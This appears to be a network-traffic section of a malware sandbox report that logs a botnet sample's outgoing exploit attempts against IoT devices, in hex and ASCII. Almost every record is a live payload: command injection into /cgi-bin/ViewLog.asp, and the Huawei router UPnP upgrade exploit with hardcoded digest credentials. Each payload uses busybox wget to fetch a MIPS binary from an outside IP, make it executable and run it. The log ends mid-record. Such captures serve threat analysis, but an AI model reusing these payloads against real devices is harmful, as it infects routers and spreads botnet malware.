                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.798621893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:06.950545073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:09.254566908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.862623930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.078504086 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:42.022419930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.886327028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              224192.168.2.135928485.247.7.2078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:05.252237082 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              225192.168.2.133720831.136.187.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:06.668447971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.270682096 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:08.422544956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:10.790566921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.398559093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.614497900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.070424080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.934340954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              226192.168.2.1340802156.235.103.22737215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:06.861313105 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:11.046618938 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:17.190638065 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:29.222507000 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
